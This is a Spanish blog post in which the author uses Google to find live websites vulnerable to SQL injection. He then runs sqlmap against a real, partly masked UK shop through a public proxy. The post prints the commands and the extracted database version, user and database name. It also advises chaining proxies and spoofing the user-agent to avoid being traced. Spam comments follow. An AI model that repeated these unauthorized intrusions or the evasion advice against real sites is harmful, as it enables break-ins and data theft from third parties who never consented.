¿que hace uno después de limpiar el baño y ver la clasificación del gran premio del Brasil?, pues irse al ordenado y buscar alguna pagina vulnerable.
Cuando estuve en Bilbao en la asegur@it iii tenia delante mio un chaval de no más de 21 años con un libro de Anaya multimedia que decia Guia práctica Hackers, preguntándole al de la conferencia por qué el nunca encontraba ninguna web vulnerable a "1 or 1=1"... Al ponente de la conferencia se le quedo cara de poker (o maligno) y al final sonrió y le dijo "chaval si todo fuera tan fácil".
Así que veamos en cuanto tiempo tardo en encontrar una sola pagina vulnerable a "1 or 1=1". Hechemos mano de nuestro amigo google y buscamos:
En 5 minutos pasando paginas por google he encontrado dos. Una es una tienda de accesorios para perros en Inglaterra y otra es un portal de juegos o revistas manga en Japón.
Ya se cual era el problema, si se hubiera gastado 20€ más se podría comprar el "Hacking con Google"... y si se da prisa le regalan el marcapagina de conejo. En el futuro no hay que menospreciar al chaval... porque toda la información está en internet y puede aprender.
Bueno como sigo muy aburrido y el blog del informático del mal no deja de decir tonterías ni escribir nada serio :), me he bajado la ultima versión del sqlmap del 20 de octubre (programa que alguien creo en mis mismas condiciones de aburrimiento).
Veamos que tal funciona con una de las url vulnerables que he encontrado. Preguntamos algo sencillito. ¿que versión de base de datos tienes?
# ./sqlmap.py -u "http://www.XXXX.co.uk/list.php?ID=1"
--proxy=http://200.206.46.178:3128 -v 1
sqlmap/0.6.1 coded by Bernardo Damele A. G. <bernardo.damele@gmail.com>
and Daniele Bellucci <daniele.bellucci@gmail.com>
[*] starting at: 21:24:52
back-end DBMS: MySQL < 5.0.0
Está muy bien, es versión moderna. Menos de 5. Veamos ahora con que usuario se hacen las conlsultas a la base de datos:
# ./sqlmap.py -u "http://www.XXXX.co.uk/list.php?ID=1"
--current-user --proxy=http://200.206.46.178:3128 --dbms "MySQL" -v 1
sqlmap/0.6.1 coded by Bernardo Damele A. G. <bernardo.damele@gmail.com>
and Daniele Bellucci <daniele.bellucci@gmail.com>
[*] starting at: 22:06:14
current user: 'r8media_kelly@44.13.56.0/255.255.224.0'
[22:31:22] [INFO] Fetched data logged to text files under '/tmp/sqlmap-0.6.1/output/www.XXXXXX.co.uk'
[*] shutting down at: 22:31:22
Veamos ahora cual es el nombre de la base de datos con la que trabaja esta web:
# ./sqlmap.py -u "http://www.XXXX.co.uk/list.php?ID=1"
--current-db --proxy=http://200.206.46.178 --dbms "MySQL" -v 1
sqlmap/0.6.1 coded by Bernardo Damele A. G. <bernardo.damele@gmail.com>
and Daniele Bellucci <daniele.bellucci@gmail.com>
[*] starting at: 23:04:20
current database: 'r9_database'
Observar que todas las peticiones que hago las hago con un proxy publico (de Brasil). Si alguien quisiera ir más allá (siempre con fines educativos) debería utilizar varios proxys encadenados tanto para utilizar sqlmap y las búsquedas por Internet. También estaría bien modificar el user-agent de las peticiones http, etc.
Nota: dicen que si lo haces con fines educativos o porque son deberes de tu profesor de aquitectura de redes, no te pasará nada.
Otro día utilizaré el sqlmap para reventar mi propia web+mysql... siempre con fines educativos.
Coño, la hora de preparar la cena...
Más información:
+ Quiero un proxy público
+ No tengo ni puta idea de que es esto de la injeción de SQL
+ ¿Hay más programas como sqlmap?
suscribirse
2 comentarios:
Hola, como estas, tu pagina esta excelente, si queres pasate por mi pagina y dejame un comentario, estan entrando mucho en mi sitio, si te interesa podemos hacer un intercambio de links, banners, cualquier cosa avisame, te dejo mi email tvinternet08@gmail.com, te mando un abrazo.
Jjaajjaja sos un genio de la web !!! Suelo hacer lo mismo cuando estoy aburrido.
Antes de despedirme les dejo una recomendacion si estan pensando en vacacionar en brasil
les dejo una recomendacion Oferta Viagens ,
vale la pena darse una vuelta !!!
Saludos a todos !!!
hacer un comentario en esta entrada